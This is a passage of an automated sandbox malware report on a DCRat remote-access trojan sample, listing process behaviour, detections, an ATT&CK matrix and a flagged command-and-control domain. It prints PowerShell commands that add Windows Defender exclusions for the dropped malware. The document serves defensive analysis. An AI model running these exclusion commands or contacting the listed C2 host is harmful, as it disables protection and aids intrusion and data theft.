                            Source: PlZA6b48MW.exe, 0000002D.00000002.2082966816.000000001B9D0000.00000004.00000020.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.2335905450.000000001BA80000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000037.00000002.1934994151.00000279C0309000.00000004.00000020.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess token adjusted: Debug
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Process created: unknown unknown
                            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Queries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\dllhost.exe VolumeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\dllhost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe VolumeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

Source: Yara match, File source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: PlZA6b48MW.exe PID: 7332, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: PlZA6b48MW.exe PID: 8256, type: MEMORYSTR
Source: Yara match, File source: PlZA6b48MW.exe, type: SAMPLE
Source: Yara match, File source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED

                            Remote Access Functionality

Source: Yara match, File source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: PlZA6b48MW.exe PID: 7332, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: PlZA6b48MW.exe PID: 8256, type: MEMORYSTR
Source: Yara match, File source: PlZA6b48MW.exe, type: SAMPLE
Source: Yara match, File source: 0.0.PlZA6b48MW.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, type: DROPPED

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 133 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

Behavior Graph (image not included): ID: 1586157, Sample: PlZA6b48MW.exe, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
PlZA6b48MW.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
PlZA6b48MW.exe | 100% | Avira | HEUR/AGEN.1323342 |
PlZA6b48MW.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Program Files\Windows Multimedia Platform\dllhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\Desktop\CwRRQJIe.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files\Windows Multimedia Platform\dllhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\CwRRQJIe.log | 100% | Joe Sandbox ML | |
C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\FvWYGyIe.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Windows Multimedia Platform\dllhost.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\CwRRQJIe.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\FvWYGyIe.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\GOnzOWoM.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\IXnYeTUQ.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\LARQmQKJ.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\MiiYvNyr.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\OeqoqbNM.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\RCSpyiiu.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\UqqnPMXK.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\YNJEaDTu.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\ZBNMMRPs.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\ZwLVNbth.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\bTenUpua.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\dZJDzodr.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\euKdPjTG.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\kAfKNzod.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\kkpLxnoP.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\mSTLtqAw.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\nIcTiRiZ.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\uWGScrdc.log | 8% | ReversingLabs | |
C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

                            No Antivirus matches
                            No Antivirus matches

Source | Detection | Scanner | Label | Link
http://505905cm.n9shka.top/imagePollLinuxCentral.php | 100% | Avira URL Cloud | malware |
http://505905cm.n9shka.top | 100% | Avira URL Cloud | malware |
http://505905cm.n9shka.top/ | 100% | Avira URL Cloud | malware |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
505905cm.n9shka.top | 37.44.238.250 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://505905cm.n9shka.top/imagePollLinuxCentral.php | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://505905cm.n9shka.top | PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003743000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
